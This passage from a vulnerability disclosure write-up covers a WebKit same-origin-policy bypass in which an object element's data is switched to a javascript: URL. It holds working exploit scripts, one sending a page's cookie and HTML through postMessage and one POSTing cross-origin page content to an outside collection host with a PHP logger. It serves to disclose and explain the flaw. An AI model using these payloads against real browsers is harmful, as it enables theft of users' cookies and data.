</script>

The POC is very easy to understand for individuals having some javaScript background. However, for others let me break it down for you. The above code creates an object with data attribute, which loads up a URL from another origin in this case "http://www.bing.com", however once it's loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line is essential for the POC to work object.innerHTML = "foobar"; so that the navigation request is performed

Let's take a look at the vulnerable code that is responsible for the causing the issue:

Vulnerable Code

bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)
{
    ASSERT(document());
    ASSERT(document()->frame());
    if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)
        return false;
    KURL completeURL = document()->completeURL(url);


The above function is responsible for loading up the frame URL, if you take a close look at the code, you would find out that there is no validation for javascript scheme, which allows us to execute javaScript in context of the frame that was loaded.

The fix

The issue was fixed by applying the following checks from securityorigin.h library.

  if (contentFrame() && protocolIsJavaScript(completeURL)
       && !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))
       return false;

Proof Of Concept Using Postmessage Call

To help understand the vulnerability better and get to the root cause, i contacted Joe Vennix from metasploit team, who modified my original POC to the following to help demonstrate the vulnerability in an effective manner. The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.

<script>
window.onload = function()
{
    object = document.createElement("object");
    object.setAttribute("data", "http://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
        object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";
        object.innerHTML = "foobar";
    }
}

window.onmessage = function(m){
  alert(m.data);
}
</script>

Proof Of Concept To Steal Data Across Domains

A great friend of mine @filedescriptor helped me with the following POC, which steals data from bing.com by accessing the document.body.innerHTML property as submits that data cross origin by using a POST request, since you can send limited amount of data with GET due to browser restrictions.

<script>
window.onload = function()
{
object = document.createElement("object");
object.setAttribute("data", "http://www.bing.com");
document.body.appendChild(object);
object.onload = function() {
object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";
object.innerHTML = "foobar";
}
}

The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.

file_put_contents('record.txt', $_POST['content']);

The following are some of the handsets that we used to test and verify this vulnerability.

Sony Xperia

LGNexus4

Samsung Galaxy S3

Safari Browser 5.0

Google's Response

The vulnerability was responsibly disclosed to Google on 9/25/2014, The vulnerability was fixed on 10/1/2014 and the patches have been released here.